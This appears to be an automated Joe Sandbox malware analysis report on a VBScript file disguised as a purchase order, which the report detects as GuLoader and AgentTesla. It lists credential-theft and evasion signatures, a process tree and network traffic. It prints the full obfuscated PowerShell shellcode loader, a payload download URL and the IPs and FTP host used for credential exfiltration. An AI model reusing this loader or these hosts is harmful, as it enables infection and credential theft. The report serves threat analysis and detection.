Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name:PO-08784 xlsx.vbe
Analysis ID:755441
MD5:266115592f966240c14dfeeec624bdf5
SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 8268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 3416 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4432 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 8812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 8896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 1352 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
PO-08784 xlsx.vbeWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa2e:$s1: .CreateObject("WScript.Shell")
  • 0x3ed54:$p1: powershell.exe
  • 0x4b97e:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""Unk
          Timestamp:192.168.11.20185.31.121.13649807212029927 11/28/22-18:14:18.239839
          SID:2029927
          Source Port:49807
          Destination Port:21
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20185.31.121.13649808564112851779 11/28/22-18:14:18.274476
          SID:2851779
          Source Port:49808
          Destination Port:56411
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
          Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2
          Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

          Networking

          barindex
          Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49807 -> 185.31.121.136:21
          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
          Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: global trafficTCP traffic: 192.168.11.20:49808 -> 185.31.121.136:56411
          Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49807 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 00000011.00000002.5824869400.000000000152A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000002.5900965300.000000001FC83000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmbImL.com
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oqyPj4HORVpk3nSGGk.net
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oqyPj4HORVpk3nSGGk.netXy
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: b3solutionscws.com
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D5FA09A recv,
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2

          System Summary

          barindex
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi 